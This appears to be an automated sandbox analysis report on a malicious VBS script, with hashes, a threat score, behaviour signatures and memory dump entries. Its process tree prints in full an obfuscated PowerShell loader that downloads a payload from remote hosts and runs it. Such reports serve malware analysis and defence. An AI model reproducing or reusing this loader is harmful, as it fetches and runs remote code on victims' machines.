Overview

overview

10

Static

static

1

7c9097341d...d9.vbs

windows7-x64

8

7c9097341d...d9.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    137s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    23-05-2024 01:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    7c9097341df9125478424c57b39c394062838aaa04bcc5725cd4a49a3b3555d9.vbs

  • Size

    15KB

  • MD5

    3ed6d6263087df6acb50d383f9646c77

  • SHA1

    3d11f3a396909f4bdda0b8b8bb7ef6b8abbad17c

  • SHA256

    7c9097341df9125478424c57b39c394062838aaa04bcc5725cd4a49a3b3555d9

  • SHA512

    e5ce4ee9fb452025cff79e23c3f335fe8b34dce4e5b315e258815212ac9cd929881c690a95d397deec0c635a0115c4eb176b557e2e877449e9a9116f8dc99f64

  • SSDEEP

    192:3Kyq8AvxRaqxtLpoMPpzkd/5Bpt0yPPGEIv97BreF56xrkoAD+h0nVJ:ayqlZRzmMxI19PGn9kF0xrgD+m

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 17 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7c9097341df9125478424c57b39c394062838aaa04bcc5725cd4a49a3b3555d9.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2320
    • C:\Windows\System32\cmd.exe
      cmd.exe /c ping 6777.6777.6777.677e
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1352
      • C:\Windows\system32\PING.EXE
        ping 6777.6777.6777.677e
        3⤵
        • Runs ping.exe
        PID:2860
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Agonistical = 1;$Uropyloric='Sub';$Uropyloric+='strin';$Uropyloric+='g';Function Seemlier($Lupulinum){$Beriberien=$Lupulinum.Length-$Agonistical;For($Sawmills=7;$Sawmills -lt $Beriberien;$Sawmills+=8){$Dobbeltdrene+=$Lupulinum.$Uropyloric.Invoke( $Sawmills, $Agonistical);}$Dobbeltdrene;}function Exportability($Swabber249){. ($plasmid) ($Swabber249);}$fortalen=Seemlier ' Ku,kstMDraperioTerritozSu,flrkiKronvi lTttendelHors,enaTekstn,/Katabas5 ,irmao.Polyorg0Semasio Tran fu(InfimumWNegatoriDy.menon UndergdForindioReko,fiwFlleseusEndesty AmenssoNUdpenslT enge.b Lensgre1Slavist0 Viga s.Charmer0Idcgyeh;Shti.un KeyboarWTindde iRheophinUnabo.i6Gdanned4Ide,tif;Faeryla dductxTrimsda6Volleys4skyline;Cynipoi Pec.izarSikke.hvTrom et:Unal ru1Toluyl.2pikrvzo1Ti,erbr. ,ernin0 Wolfga)subsali GaaebilGDybvande AagsdecFormeshkChronoloAolgrun/Pompado2damebla0veterin1 Abec,d0Gedebuk0t mlksz1Pjaltes0Newl.ns1Stam fd O,biculF .illebiunslackrEddadige Si kerf orudbeoBist ndxOu stri/Zit.nde1T.lstan2Dispur 1Smrk,ge.prferen0Omk rte ';$Fretfulness=Seemlier 'RuffianU Undu lsLanioideIstemmer.orplan-SandhedA,nderkegTranscheM.llemdnsta.pubtBryl up ';$Subtler30=Seemlier 'sagsbehhTub.rkltAfb.ndet ,artgrpMeterinsHarefoo:Brakp j/chemot /AkkusatcLign.usaStran,ldOutquereUdslusenNsegrusa Gena vd Lev.edeSqlopm.r Val.eveKonformgPropugnaleg,turltele,onoPulsi,gsRoskild.Inter,acVedblivoKurgansmOesopha/UnimploIBar.hjesSessio tNudistet WinospetestesqsAndelsl.Jogg.tsmOptjenesPisanmaoThiossp>U ttedehRumkapstsprint,tUpwellspMezzomo:Omkal.a/valgkon/For undmRaffineaKronolodMaidenhi eskontbAdvis.paAflbs.erguzzl.fo Pe,iphhForklari nfringlNeuropta NaboselNoemataaDullishtCyclosewPerval,oRaflin . GroveldMandariuRechri.cThorborkGlattetd atermanmandarisSuc.our.OmgangsoAzimec.rProxenygTraditi/ keratea ExscrilStorsejlDrejefo/MinifyiI Brais sKlipshotgumbofitUntolereScumblesOp,akni.OverorgmVak umpsGrif.itoCindere ';$Mandatsvig=Seemlier 'Operett>Stodder ';$plasmid=Seemlier 'IllegibiAutorise,obermaxK eatio ';$Miny='Rhabdolith';$Dhobis158 = Seemlier 'UnresiseM,lkekecFlyveashVen.avaoHierati .umpfeb%ankr ngaBankcarp Udspr pUhilde,dBetonklaHansomptGodtgreaFodbold%Dyrerig\ OpskreS FeazeduSydslesbCosmoz.fPunk.umuPegemarmSpiritiiKattekig.mbracuayohimbit ChronoiChann.loForkor nRetouch. EfterlSPrecompaKontor.nCitifyi Dulcify&La.dstn&Futures CivetleDipar.nc Byg,nsh bindegoStedsad Dybfalstslagtet ';Exportability (Seemlier 'Gldel,m$ EuforigUinitialundimero Fremsab GuazutaNybblizlBefordr:.leetsgSAnisogetSlappese JobbergSensit o hin,escKrestineadressepAbolitih UdbeneaCor,icelNeglecti RelatiaLrerrolnAgerbk = Canter(CaddisfcA.apneamaugmentdNonpres Trimero/SnoreascGavinsu Formabl$EmotiveDCompo,ehAkrylfioHe,tivebBoganmei ellmes.ardenp1Mannose5Cathart8Mooleys)Lak.ymy ');Exportability (Seemlier 'Lgese.r$overseng ookleslOublietoForlagsbAutotroaE.cumbrlAlcohol: Fatherp PolereaSel,risbApologiu TelefolReplayiaUnde dkt AstersoAntebrarSkovturyHugge.l=Overskr$ PresenSUnwand uAlgovitbForskertKartot,lIndbjrge Ajatasrun.oard3 Crease0Dassern.G amhulsOut ullpBoledlalCaptandiBil.ilstTale,da(Defleae$ VilligMBipla.aaSkrmslenOrphicid Anatoma Inner.tBatstersTypfremvUnfaireibehandlg ,ingen) appall ');$Subtler30=$pabulatory[0];$Skbnegudinder= (Seemlier 'Lampb.a$BlegrdggForforslUns ppooBurhnseb Darbieanonsol,lradi rs:Kontra,TUlfsfioeEntrea,oAc,nthasLivegneoShapelefchoripefsammenseAlkoholrFor,naksAla msi=Grann,bNland.kie FalxilwSlaaend-OxaliseOPlejehjbLaserprjDomorgaeLiveli.c hjnelstHouselu SaltetuSFil tfay SpottesE.largetparafr.eRoestonmKondukt.SkalkeaN Sp,ldeeSvirpertSkattet.MetalizWMedlemseUhjemleb skovwC Reweigl LgehjliFangarmeTrien.anSpillelt');$Skbnegudinder+=$Stegocephalian[1];Exportability ($Skbnegudinder);Exportability (Seemlier ' Leathe$Dream.rTMisdidieForbereoStv rans Limejuo Lovovef Disa,uf uncarie Epileprbiltoges ,gemad.KkkenhaHS aerkeeS ovlhoa Van.aldPer,erae aarshrPlettecs Benzin[Asterse$BarotheFAnlbsbrrSpise.te Porch,t Suddsff BoikoeucavilatlDistr in Afrejse.krligssStomachsGalaxyt]Erke,de= An.iop$kvatorifUturbelo .osensrSogd.ittSvaleskaGabbroil VouchseLseferinYnk,rme ');$Selektoren=Seemlier 'Tapioli$fibrospTMargerie.rnevreo RustnisChromiuoOmsej.ifFilmcarfTur.lebeUnoppror uitenosSinolog.ort ginDNashdydoSummerrwanisophn Genuselanodiseounconcla stadiodpearlfrFUnsquiri clar,slPhysickeUnservi(Inseein$ CockerS illianuCirk,enbGropesutGaggle,lUnderleeF uffyarerpi gh3O nifor0 Bran n,detalje$Conve,tF CyclonlGawciemuCondo.eorigmorsb Blowdoo ProtokrKorstogiBi dseed ,nzoote St efu)Suburba ';$Fluoboride=$Stegocephalian[0];Exportability (Seemlier ' Ggleri$ Anorgag.ordemdl xrpiceoWaufielb .rigena,tormskl Bestrg:PassereFAflaaseoI gentvrPhoraunh.oofulvaGripieraSavklinnStin,budun.pacisThyroidvUnmode uPhlyctarT.nystodTeglvrke Encharr ,planei Lets rnFors,nig WienereTimablerSoffices Vleire= Plastr( RoolinTIntereseForviklsGlamo.rtTapresr-RedigerP SowarraKropsvitBandinehWal,mei Ankedeh$ FortegF Kon,talhurliesutektiteoStjrtsob Coelogohypercor rmandeiEnkeltsdCa.hinieKenspia)Omgrupp ');while (!$Forhaandsvurderingers) {Exportability (Seemlier 'U.gdoms$TristfugIdealetlUncoveto,padserbUnstrena multiplRdkridt:UddykkeY Ultrafefo eparcFrigrelhHybosis=Soel fe$Cr.wbeltPseudoarQuarteruBrdr,meeTinfoli ') ;Exportability $Selektoren;Exportability (Seemlier 'SunbursSSekterdtEgoe neaStereotrMezza,itFolkemo-Samfu dSSelv.ydl Schap.ePilgrimeBernyhap No.ade Sortend4Schizo. ');Exportability (Seemlier 'culture$JagtetigCarvalplA vocatoMa.ifesb DybsinaTidsflgl.eptent: FornedFL.ftforo Reg eurEsserm.hkystbanaKu,sensaCephalanRewarmsd ExpenssMorphonvKulturouHee.raarKorsfardIndfrseeOplysnirWhelpsni TittlenBankre,gyach ereNibelunrErnri,gsFon.sbr=Demonte(GhatphaTPrerogaeX,menessSkitt.stUnderge-H,manitPVirus raAand fotkataly h System Noilybu$ S,ikneFUnirri lSal.ndkuSt vninoZa,hudbbNaboejeoMisil rrFagklasiClam,ridplanmsseLuculla)Punal a ') ;Exportability (Seemlier ' .nooze$PlyndregGrnthanl.nstigaoA tercob Hypos aMa simul Checkb:Resin iAHin steeBesgersvdiscer.iGrundlotDameskreVurderirAffaldsnP,lypetaAsur.brlTordhoc2Wales.r4 erpend5Ungar e= armoni$MonoflagStrenuolL nieudoPis chibTekstbea G mnodlKdderf,: NondefNTopestaaSygebesv MuslinlU obilieDifferebPublicueUnconsts VerdslkrightinuAlloxycepneumonlImdekomsAerome,eGoddammnMesmeri+leishma+sonarst%Borgerl$Rued,inpDelirieaAmmunitbAndefaruEs.arpilKommu aaUbalanctDrouddio G ahamrVirkninyrural.t.Skriftsc Scrofuo.etiolouGymmalcnGrammattOprinde ') ;$Subtler30=$pabulatory[$Aeviternal245];}$Dispensation=339954;$Pholadian=30904;Exportability (Seemlier 'Markeds$AstrogagReifikal Ha.duro Qui,zib Trbeska Roo erl Unbu,g:NeoprenFTyn depoMilitr.rDybdebodMortorieForfattlStrigleiTimarspnUglegylgKredi,nsKnofedtnUn.quabg M tromlLexigraeStttefa Semiped=For.ren AnrettGTelefonePseudoztOverdis-UnderbuCAmbass oUdskudsnUdlndintOvergroe .ypotanM,chanitHyrer.e Mouldsd$ ScratcFMoultunlJumbosmuFrockmaoEksekutbObservaoSkibsharSuppesti Udvandd IridoteFolketi ');Exportability (Seemlier ' Cyke.l$UafsttegPerinepl IrascioBenyttebVendbaracavemenlYtterit:PrognosA Midsumr.ontrapt Udstr.eSaute.blRak,ers Led,ing=Endople Re,artr[Oys.erfSs,uropsy Co,ects Emerantun,esoueKeld.tumExocli .Avlsh sCMetropooHaendelnUnforg,vBasishaeEquitanrUgentlit Covent]Raacrem:clearin: MatadoFfinansmrLenjanooBilagdemNyindviBAntiaggaFartingsAflo kee Coyoti6Damebla4CollisiSUnbesiet p.naltrUsl.kkeiFladbarnS.rewdog Gourme(Ordinat$HaldorsF klasseojonniesrSinuou.dS.einedePotomanlGgeguleiOmkostnnPorringgSlukkersForbrdrn Skldsog osidetl,aastrkeNonc nt)Cor,ico ');Exportability (Seemlier 'Stnkerb$ Guit.rg PrsidelUncialeoPolyvinb.denocya Mus.ullBl,tsho:Po.ularFVirke roConfessr ChartetSubcaulrVismuttoMul ipllSovemediBrdderngB ondseeappealertile neeSkivgat Bi.elkr=Ka.elso Calyptr[BeautieS Out.rayskonnersBagsidetFletchieEnarmetmUdgangs.SproedeTYard,hoeJarlenaxHone,detSmellso.BlasensEZirkonenAabningcFlaad dokuldegrdBibliotiBrev.ekn Bast,rgPrunifo]Nationa: Ek.per:MamaligA BrainsSLactamsCAabrin ISved,ntIMe,oxal.UdtagelGPicke eekermyentVari.liSTf.ernetDisentirNegativi hirskanYellerigVa,benm(Ret hen$CoinersAAl ngarrMark,setPlebejeeB.giosulSygdoms)Synds,e ');Exportability (Seemlier 'Sali om$Undes.egFpcsparlrigborgoOnomatobStodde.aNondispl.indjam: nathimCSnutsi,oBldgrinwGanderatK ntohaaKarpasaigene all ajance2Fritter5I.parta1 Aberra= Skinma$WoodpilFDrukturoReharrorForsvrgtFugleunrRevis.oo Sup rdlSprydstiPragt.tg VirksoeByttererEkvilibeRegnspo.Feasibls kultisuBrisselbAssistesLiberattComfor rSjettedi .abelonAffal sg.istern( Aprj.e$FulcrauDdecoyini Recosts ligopop GyronseBesvrlinSmel ersPolicewa.ybgrnnt NgtetaiGuldstyoK.mikern nplat, Tyller$sobre,tPBlotchyhradiom o RejseplFremgaaaForkalkdTrykk si U eslua Dmon,snBethesd)Workf,l ');Exportability $Cowtail251;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2936
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Subfumigation.San && echo t"
        3⤵
          PID:2472

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2936-4-0x000007FEF5EAE000-0x000007FEF5EAF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2936-5-0x000000001B200000-0x000000001B4E2000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2936-6-0x0000000002320000-0x0000000002328000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2936-7-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2936-8-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2936-9-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2936-10-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2936-11-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2936-12-0x000007FEF5EAE000-0x000007FEF5EAF000-memory.dmp

      Filesize

      4KB

      Download